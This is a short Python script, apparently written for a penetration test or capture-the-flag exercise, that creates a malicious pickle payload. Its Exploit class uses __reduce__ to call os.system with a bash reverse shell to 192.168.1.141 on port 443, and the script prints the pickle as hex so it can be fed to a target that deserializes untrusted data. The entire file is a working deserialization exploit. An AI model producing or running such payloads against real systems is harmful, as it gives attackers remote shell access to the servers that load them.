#!/var/bin/env python3

import pickle
import os
import binascii

class Exploit(object):

    def __reduce__(self):

        return (os.system, ('bash -c "bash -i >& /dev/tcp/192.168.1.141/443 0>&1"',))


if __name__ == '__main__':

    print(binascii.hexlify(pickle.dumps(Exploit())))
